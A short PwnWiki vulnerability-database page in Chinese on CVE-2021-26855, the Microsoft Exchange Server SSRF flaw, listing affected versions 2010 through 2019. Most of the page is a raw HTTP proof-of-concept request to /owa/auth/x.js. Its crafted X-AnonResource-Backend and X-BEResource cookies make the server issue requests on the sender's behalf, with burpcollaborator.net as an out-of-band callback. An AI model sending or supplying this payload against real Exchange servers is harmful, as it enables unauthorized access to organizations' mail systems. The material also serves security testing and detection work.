Loading
0

CVE-2021-26855 – Exchange Server SSRF漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

This page contains changes which are not marked for translation.

漏洞简介

Exchange服务器端请求伪造(SSRF)漏洞,利用此漏洞的攻击者能够发送任意HTTP请求并通过Exchange Server进行身份验证。

影响范围

Microsoft Exchange Server: 2010

Microsoft Exchange Server: 2013

Microsoft Exchange Server: 2016

Microsoft Exchange Server: 2019

SSRF

GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close

Ssrf.jpg

免费、自由、人人可编辑的漏洞库--PwnWiki.com